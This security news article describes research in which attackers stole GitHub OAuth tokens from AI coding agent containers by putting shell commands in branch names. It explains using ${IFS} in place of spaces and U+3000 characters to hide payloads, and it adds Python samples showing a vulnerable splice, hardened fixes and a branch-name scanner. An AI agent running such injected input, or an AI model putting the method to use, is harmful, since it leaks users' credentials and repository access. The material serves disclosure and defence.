Security researchers have demonstrated a command injection technique that allows attackers to steal GitHub OAuth tokens from AI coding agent containers by manipulating repository branch names.
BeyondTrust Phantom Labs’ latest findings showed how attackers could exploit backend API functionality and container logging processes to access sensitive tokens used by AI coding agents.
The researchers first retrieved GitHub access tokens by querying backend task history endpoints and reviewing container logs.
After obtaining a single token, the team developed a method to automate token exfiltration across multiple users: GitHub branch names were crafted to carry shell command injection payloads that execute when the AI agent's container processes the branch name in a shell command.
GitHub does not allow literal spaces in branch names, so the exploit used the Bash Internal Field Separator variable (`${IFS}`) in their place. When the unquoted name is interpolated into a command line, the shell expands `${IFS}` to whitespace and word-splits the result, so the injected command runs with its arguments intact despite GitHub's naming restrictions.
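The following added example (not code from the research or from any agent vendor) shows the root-cause pattern in Python: a branch name spliced into a command string that `/bin/sh` parses, beside two hardened forms. `printf` stands in for `git fetch origin <branch>` so it runs without a repository; the branch name is constructed here and assumed, not one observed in the research.

```python
import subprocess

# Constructed branch name for this example, not one used in the research.
# GitHub refuses a literal space in a ref name, so ${IFS} stands in for it:
# sh expands ${IFS} to " \t\n" and then word-splits, yielding `echo INJECTED`.
MALICIOUS_BRANCH = "feature/login;echo${IFS}INJECTED"


def fetch_vulnerable(branch: str) -> str:
    """Splices the branch name into a command string that /bin/sh parses.

    A real agent would build something like `git fetch origin <branch>`;
    printf stands in for git so the example runs without a repository.
    The `;` ends the intended command and whatever follows is executed too.
    """
    cmd = f"printf 'fetching %s\\n' {branch}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def fetch_hardened(branch: str) -> str:
    """Passes the name as one argv element: no shell, so no parsing or expansion."""
    argv = ["printf", "fetching %s\n", branch]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def fetch_hardened_via_shell(branch: str) -> str:
    """When a shell is unavoidable, hand the value over as a positional parameter.

    The script text is fixed; the branch arrives as $1 and is referenced
    double-quoted, so metacharacters and ${IFS} inside it stay literal.
    """
    script = 'printf "fetching %s\\n" "$1"'
    argv = ["sh", "-c", script, "agent-fetch", branch]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    print("vulnerable:", repr(fetch_vulnerable(MALICIOUS_BRANCH)))
    print("hardened:  ", repr(fetch_hardened(MALICIOUS_BRANCH)))
    print("via shell: ", repr(fetch_hardened_via_shell(MALICIOUS_BRANCH)))
```

Running it prints the vulnerable path executing `echo INJECTED` as a second command, while both hardened paths print the branch name verbatim, `${IFS}` and all. The difference is not escaping but where the boundary sits: in the argv forms the untrusted value never reaches the shell parser as code.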
Unicode Obfuscation Used to Hide Malicious Payloads
To make the attack harder to detect, researchers also demonstrated a payload obfuscation technique using Unicode ideographic space characters (U+3000). These characters were inserted into branch names to hide the malicious command, while still allowing execution in the container environment.
In testing, when a user interacted with the malicious branch, the container executed the injected command and sent the user's GitHub token to an external server controlled by the researchers.
The technique also worked in automated code review environments, where the AI agent was triggered via pull request comments rather than by a user action.
BeyondTrust said the root cause of the vulnerability was insufficient input sanitization when user-controlled data, such as branch names, was passed into shell commands inside agent containers. OpenAI confirmed the flaw has now been remediated.
The research exposed a structural risk in how AI coding agents are deployed: these tools operate as execution environments with direct access to sensitive credentials and organizational repositories, yet input sanitization controls often lag behind their expanding capabilities.
Security experts recommend organizations audit AI agent permissions, enforce least-privilege access, monitor repositories for suspicious branch names (shell metacharacters, `${IFS}`, and non-ASCII whitespace such as U+3000), rotate tokens regularly, and ensure user-controlled inputs are validated and passed to commands as arguments rather than interpolated into shell command strings.
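As an added example covering both the branch-name monitoring recommendation above and the U+3000 obfuscation described earlier, the Python below (not tooling from the research) scans a list of branch names for the indicators this research surfaced. The allow-list pattern and the sample names are assumptions of this example; the Unicode categories are from the standard library.

```python
import re
import unicodedata

# Allow-list covering ordinary branch names. Anything outside it is also
# checked against the specific indicators below. The policy is an assumption
# of this example, not a published standard.
ALLOWED = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/-]*")

# Characters that end a shell word or start a command/substitution when the
# name is spliced unquoted into a command line.
SHELL_META = ";|&$`(){}<>\n"

# ${IFS} (or $IFS) stands in for the space that git refuses in a ref name.
IFS_SUBSTITUTE = re.compile(r"\$\{?IFS\}?")


def branch_findings(name: str) -> list[str]:
    """Return human-readable indicators for one branch name (empty if clean)."""
    findings: list[str] = []
    if not ALLOWED.fullmatch(name):
        findings.append("outside allow-list")
    meta = sorted({c for c in name if c in SHELL_META})
    if meta:
        findings.append("shell metacharacters: " + repr("".join(meta)))
    if IFS_SUBSTITUTE.search(name):
        findings.append("IFS used as space substitute")
    for ch in name:
        # Zs = separator/space, Cf = format (zero-width and bidi controls).
        # U+3000 IDEOGRAPHIC SPACE is Zs; git's ref checks only reject ASCII
        # space and control characters, so it passes through untouched.
        if ord(ch) > 0x7F and unicodedata.category(ch) in ("Zs", "Cf"):
            findings.append(f"non-ASCII whitespace/format char U+{ord(ch):04X} "
                            f"({unicodedata.name(ch, 'unnamed')})")
            break
    return findings


def scan(names: list[str]) -> dict[str, list[str]]:
    """Map each suspicious branch name to its findings; clean names are omitted."""
    return {n: f for n in names if (f := branch_findings(n))}


# Constructed sample names for this example, not taken from the research.
SAMPLE_BRANCHES = [
    "main",
    "feature/login-form",
    "release-1.4.2",
    "fix;echo${IFS}pwned",
    "feature/login\u3000\u3000\u3000;echo${IFS}pwned",
    "build$(id)",
]


if __name__ == "__main__":
    for name, findings in scan(SAMPLE_BRANCHES).items():
        print(repr(name))
        for finding in findings:
            print("  -", finding)
```

The allow-list is the control that matters for an agent backend: a name that fails it should be rejected before any command is built, regardless of which indicator fired. The individual indicators exist so that a monitoring job can explain why a name was flagged and so that names padded with ideographic spaces, which look blank in many UIs, are surfaced explicitly.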